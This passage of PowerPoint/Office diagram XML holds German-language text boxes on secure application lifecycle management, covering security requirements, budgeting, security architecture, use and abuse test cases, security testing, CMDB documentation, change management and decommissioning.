        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="l" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Zusammenstellen der technischen Anforderungen inkl. funktionalen und nicht-funktionalen Anforderungen an die Sicherheit.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" type="parTrans" cxnId="{DE5646CC-F144-493B-9414-C6346E590FF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{595F5683-5B41-4144-8717-8475FEB51759}" type="sibTrans" cxnId="{DE5646CC-F144-493B-9414-C6346E590FF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="l" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Planen und vereinbaren des Budgets, das alle Aspekte abdeckt, vom Design, Entwicklung, Testen bis hin zum Betrieb sowie die Sicherheitsmaßnahmen.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{918768C3-D12F-4161-B487-A57F29898241}" type="parTrans" cxnId="{34810BA8-ABE6-4135-9DA7-66092273C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}" type="sibTrans" cxnId="{34810BA8-ABE6-4135-9DA7-66092273C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Bewerten Sie den Erfüllungsgrad der technischen Anforderungen inkl. Planungs- und Design-Phase.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21595102-299C-4FC9-AD15-9036120CA438}" type="parTrans" cxnId="{953325A0-207E-4AE6-A6DC-14B69025B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}" type="sibTrans" cxnId="{953325A0-207E-4AE6-A6DC-14B69025B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{495252AF-5996-4B38-A1EE-B648650A10A0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Nutzen Sie Vorlagen und Checklisten, z.B. den </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="9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a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0" err="1">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Contract</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="9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 Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="9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2"/>
            </a:rPr>
            <a:t>deutsch</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>). </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" b="1" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Hinweis: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" b="0" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:rPr>
            <a:t>Das Dokument ist ausschließlich als Orientierungshilfe anzusehen, es bezieht sich auf US-Recht. Konsultieren Sie in jedem Fall einen spezialisierten Anwalt, bevor Sie es benutzen</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" type="parTrans" cxnId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F126DBDA-495B-4894-915F-3153C0E98C12}" type="sibTrans" cxnId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{657D5226-6628-4A3D-87F9-833B7666A7A2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Definieren Sie, unterstützt von Sicherheits-Spezialisten, die Sicherheits-Architektur, allgemeine vorbeugende Maßnahmen und gezielte Gegenmaßnahmen entsprechend dem Schutzbedarf und dem erwarteten Gefährdungsniveau.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" type="parTrans" cxnId="{6C048991-4CC6-48F3-85DE-06094639B4B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}" type="sibTrans" cxnId="{6C048991-4CC6-48F3-85DE-06094639B4B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Erzeugen Sie “</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Use</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 und “</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Abuse</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-Testfälle” aus technischer und fachlicher Sicht.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" type="parTrans" cxnId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B6FED2A-CCAD-4150-BE86-460500775F70}" type="sibTrans" cxnId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Koordinieren Sie Sicherheits-Tests gemäß den internen Prozessen, dem Schutzbedarf und dem angenommenen Gefährdungsniveau der Anwendung.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" type="parTrans" cxnId="{2AE97330-074B-4EBD-B20E-409131B4C40C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}" type="sibTrans" cxnId="{2AE97330-074B-4EBD-B20E-409131B4C40C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Nehmen Sie die Anwendung i</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="9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n Betrieb </a:t>
          </a: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und übernehmen Sie ggf. Daten aus Altanwendungen.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{899E3CF7-9D0C-4165-A610-81A1077E783C}" type="parTrans" cxnId="{48311AAE-790D-405B-BEB3-7AB59042F49A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}" type="sibTrans" cxnId="{48311AAE-790D-405B-BEB3-7AB59042F49A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Vervollständigen Sie die Dokumentation, inkl. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" strike="noStrike" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>in</a:t>
          </a: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 der </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Configuration</a:t>
          </a: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 Management Data Base (CMDB) und die Sicherheitsarchitektur.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" type="parTrans" cxnId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{585354FF-8734-42ED-AE1D-8349C73E2B59}" type="sibTrans" cxnId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Sensibilisieren Sie die Anwender für Sicherheitsaspekte und lösen Sie Konflikte zwischen Benutzbarkeit und Sicherheit.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36639052-9A6E-47C7-A020-F81AA12F1A3C}" type="parTrans" cxnId="{EE369573-7275-4190-A508-8493472AD3CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1887D76E-BF0A-4F02-9071-53896CF7538A}" type="sibTrans" cxnId="{EE369573-7275-4190-A508-8493472AD3CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60779E52-CC5F-4109-9E02-C8F73324C37D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Planen und begleiten Sie </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Changes</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 z.B. Versionswechsel der Anwendung oder anderer Komponenten wie das Betriebssystem, Middleware und Bibliotheken.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C494CE06-D836-41D9-ADFD-898F15E5786C}" type="parTrans" cxnId="{49821016-59B2-49A9-8B65-5A27F6D118C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}" type="sibTrans" cxnId="{49821016-59B2-49A9-8B65-5A27F6D118C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Aktualisieren Sie die vollständige Dokumentation, inkl. der CMDB, der Sicherheitsarchitektur, vorbeugende Maßnahmen, Gegenmaßnahmen und das Betriebshandbuch.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F121DD58-051E-4186-B611-30AF12D23895}" type="parTrans" cxnId="{B98CA423-6056-48A5-8715-E2F822D9E61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}" type="sibTrans" cxnId="{B98CA423-6056-48A5-8715-E2F822D9E61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="18000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Ändern Sie den Zustand der Anwendung in der CMDB auf "außer Betrieb“.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" type="parTrans" cxnId="{97452B92-22D7-4E80-B74D-5D72DE542765}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56B4B5BC-D671-4D10-91B2-18BB09341248}" type="sibTrans" cxnId="{97452B92-22D7-4E80-B74D-5D72DE542765}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0911EE0D-9D23-40C7-A4EF-7824DDE63B38}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Vereinbaren Sie alle technischen Anforderungen inkl. Design, Sicherheit und Service-Level-Agreements (SLAs).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37B94FDF-0D56-42E3-B8BF-6214133CEEAC}" type="parTrans" cxnId="{737CA7C6-50FC-44B5-8389-0CEB00D8B5A2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9ED848A5-3C72-4252-8B24-F6C5E758426A}" type="sibTrans" cxnId="{737CA7C6-50FC-44B5-8389-0CEB00D8B5A2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E228679-E9E3-4F91-B4E1-32048CD950E7}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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Stellen Sie sicher, dass es in jedem Sprint Sicherheits-Stories enthalten sind, die Auflagen für nicht-funktionale Anforderungen enthalten.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F582F79B-F217-477B-85D0-6A0F5AE522FE}" type="parTrans" cxnId="{F162FF80-E526-4DF1-804E-5C3BF900F9BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
